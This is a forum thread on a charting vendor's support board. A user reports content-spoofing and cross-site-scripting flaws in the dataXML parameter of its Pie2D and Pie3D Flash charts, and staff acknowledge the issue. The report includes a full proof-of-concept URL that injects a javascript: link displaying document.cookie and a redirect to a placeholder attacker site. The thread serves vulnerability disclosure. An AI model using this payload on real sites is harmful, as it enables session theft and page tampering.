Michelle Report post Posted November 1, 2011 Is there any type of data validation that is performed for the dataXML parameter that is passed to the Pie2D.swf or Pie3D.swf files? We have concerns about the ability to pass malicious javascript in this parameter. Share this post Link to post Share on other sites
Guest Angshu Report post Posted November 2, 2011 Hi, Welcome to FusionCharts Forum! Could you please elaborate your query a bit more? It would be helpful, if you could send us a screenshot or any live link of your requirement. Awaiting for your response. Share this post Link to post Share on other sites
Michelle Report post Posted November 2, 2011 On 11/2/2011 at 5:08 AM, Angshu said: Hi, Welcome to FusionCharts Forum! Could you please elaborate your query a bit more? It would be helpful, if you could send us a screenshot or any live link of your requirement. Awaiting for your response. We are thinking the "dataXML" parameter used by Pie2D.swf and Pie3D.swf has Content Spoofing and Cross Site Scripting vulnerabilities. It seems that it does not currently validate data passed to it and allows an attacker to alter any chart hosted within the current domain and include malicious javascript that will execute when a user interacts with the altered chart. Here is an example using Pie2D.swf. The same applies to Pie3D.swf. This is not a live example because I used fake domains. https://your.domain.com/your/path/to/swf/Pie2D.swf?chartWidth=290&chartHeight=160&debugMode=0&DOMId=fusion_chart®isterWithJS=1&scaleMode=noScale〈=EN&dataXML=%3Cchart%20caption=%27Security%20Assessment,%20Inc.%27%20subcaption=%22Fusion%20Chart%20Content%20Spoofing%20and%20XSS%22%20showPercentageInLabel=%271%27%20showValues=%270%27%20showLabels=%271%27%20showLegend=%271%27%3E%3Cset%20value=%2714.94%27%20label=%27Redirection%27%20color=%27429EAD%27%20link=%27http://www.hackersite.com%27/%3E%3Cset%20value=%2719.17%27%20label=%27XSS!%27%20color=%274249AD%27%20link=%22javascript:confirm%28%27Security%20Assessment,%20Inc.%5Cn%5CnAn%20attacker%20has%20just%20captured%20your%20session.%5Cn%5Cn%27%252bdocument.cookie%29%22/%3E%3Cset%20value=%277.14%27%20label=%27Key%20Lime%27%20color=%27AD42A2%27/%3E%3Cset%20value=%277.75%27%20label=%27Apple%27%20color=%27D4AC31%27/%3E%3C/chart%3E Share this post Link to post Share on other sites
shaio Report post Posted October 29, 2012 hello, We using your XT version and we have the same problem, do you have any answer for that issue? tnx On 11/2/2011 at 5:08 AM, Angshu said: Hi, Welcome to FusionCharts Forum! Could you please elaborate your query a bit more? It would be helpful, if you could send us a screenshot or any live link of your requirement. Awaiting for your response. Share this post Link to post Share on other sites
Guest Sumedh Report post Posted October 30, 2012 Hi, Our Engineering team is currently working on this. We will get back to you on this, as early as possible. Share this post Link to post Share on other sites
